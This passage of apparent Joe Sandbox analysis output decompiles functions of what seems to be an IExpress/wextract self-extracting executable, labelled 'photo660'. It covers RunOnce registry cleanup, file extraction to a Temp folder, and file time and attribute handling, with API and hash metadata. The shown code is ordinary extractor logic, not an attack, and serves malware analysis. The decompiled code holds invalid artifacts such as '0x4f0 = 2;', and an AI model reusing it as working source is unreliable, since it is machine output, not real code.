                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0021538C,?,?,0021538C), ref: 00212005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(0021538C,wextract_cleanup1,?,?,0021538C), ref: 00212017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(0021538C,?,?,0021538C), ref: 00212020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 849931509-1592051331
                                                                                                                                                                                                        • Opcode ID: e995269385fb87aba3d6bcd46396bf66b0a02169732196a9bbc16e86322af273
                                                                                                                                                                                                        • Instruction ID: 07528238802b128a0b0e27d4e9ef13100d0fb8e82abdfb210a0bb019a4107f41
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e995269385fb87aba3d6bcd46396bf66b0a02169732196a9bbc16e86322af273
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91E04F30561318FFD7218F90FD4EFEA7BAAEB39780F100294B904A0061EF615AA4D605
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00214CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x218004; // 0x58ac7c6d
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x2191d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00214E99(_t75);
						L35:
						return E00216CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x218584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x2191e4;
						_t58 = 0x2191e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x2191e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x2191e4;
						_t30 = E00214702( &_v268, 0x2191e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0021476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00214980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E002147E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x2193f4 =  *0x2193f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x2191e4;
						_t63 = 0x2191e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x2191e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x2191e4;
						_t30 = E00214702( &_v268, 0x2191e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00214C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00214B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E00214B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}


                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00214DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00214DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-1116576409
                                                                                                                                                                                                        • Opcode ID: 98452341467ea9332dd856b82588a0831e523b2b1958fdc6cd534de33100e8d6
                                                                                                                                                                                                        • Instruction ID: 342c11ae0db56a629c0f58823cbd009badf0c69fccfb52c5391a441f7f3dd34e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98452341467ea9332dd856b82588a0831e523b2b1958fdc6cd534de33100e8d6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B84125362201039BCF25BF28E8586F673E5EB75300B148669D88E97181DE31EEE6CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0x218d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0x218d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 00214C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00214C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00214C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: c8c039ea3e857c7393aeb428f6e2cfca7df951b7101cbbbbb54aa698b68091ee
                                                                                                                                                                                                        • Instruction ID: 453f7dffdaa90e542c94689ddb07ebd2f021968cfc082bd073a35f6e032dca87
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8c039ea3e857c7393aeb428f6e2cfca7df951b7101cbbbbb54aa698b68091ee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F0627251120AAA9B14AFB4DC49DFB77ECEB24340744453BA519C1050EA31D964C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E0021487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E0021490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00214A23,?,00214F67,*MEMCAB,00008000,00000180), ref: 002148DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00214F67,*MEMCAB,00008000,00000180), ref: 00214902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 3853d35609e9c3688eb279a707a8dc18757ba92d1400faf230d8562a8ebfe274
                                                                                                                                                                                                        • Instruction ID: a342dcf724b5ca4a8f0417a10dd9531e736bce61c8c1fccba9f0071cb316d8b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3853d35609e9c3688eb279a707a8dc18757ba92d1400faf230d8562a8ebfe274
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3014BA3E2257026F32460295C89FF7559CCBA6734F1B0335BDAEEB1D1D5645C5481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00214AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0x21858c; // 0x268
                                                                                                                                                                                                        				_t9 = E00213680(_t20);
                                                                                                                                                                                                        				if( *0x2191d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0x218d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0x219400; // 0x783b9
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0x219400 = _t15;
                                                                                                                                                                                                        							if( *0x218184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0x218584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x2193f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00213680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0021369F
                                                                                                                                                                                                          • Part of subcall function 00213680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136B2
                                                                                                                                                                                                          • Part of subcall function 00213680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00214B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: 1f658559dbf521c4ed1dd7fdcd11f9c84c364cc06e3d85feb4150b22e866bcee
                                                                                                                                                                                                        • Instruction ID: eb227cd6b8516d08b0ad7ab5cf2a8d67120584c6cb1a6767060fb08a5a9eca59
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f658559dbf521c4ed1dd7fdcd11f9c84c364cc06e3d85feb4150b22e866bcee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F01AD31610201ABD7049F28EC59BE27799EB64729F04C225E93D9A1E0CF70C9A1CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0021658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0x218b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0x218b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E002116B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00218B3E,00218B3F,00000001,00218B3E,-00000003,?,002160EC,00211140,?), ref: 002165BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: 31931ba4141faa4e1b401f9655a40839bce5cfb3bf1d03be7f8bbb1ed0d425b1
                                                                                                                                                                                                        • Instruction ID: a8ef7e80eecadaa5891d8ebda16856471c073eaf24fd7dc54ac5b53fe73a9f0b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31931ba4141faa4e1b401f9655a40839bce5cfb3bf1d03be7f8bbb1ed0d425b1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEF042321142517BD3310D1D988CBEEBFDF9BA5350F64415EE8DEC3205CAA54CD583A4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E0021621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E0021597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E002144B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0x219124 = E00216285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0021623F
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: d1a8111a74f7a1ce86ed7d89f4b5bf9212413317ebb063c525a84b66fbe0e20e
                                                                                                                                                                                                        • Instruction ID: 9274724b459608e52c548e3def425e26043655fdc303a425771f006a8237c9a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1a8111a74f7a1ce86ed7d89f4b5bf9212413317ebb063c525a84b66fbe0e20e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AF0B4B0610208ABD750EF749D0ABFE36ECDB74700F50446AA989D6081DD749DE48A90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00214B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0x218d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0x218d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0x218d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x218d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x218d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x218d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x218d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00214FA1,00000000), ref: 00214B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
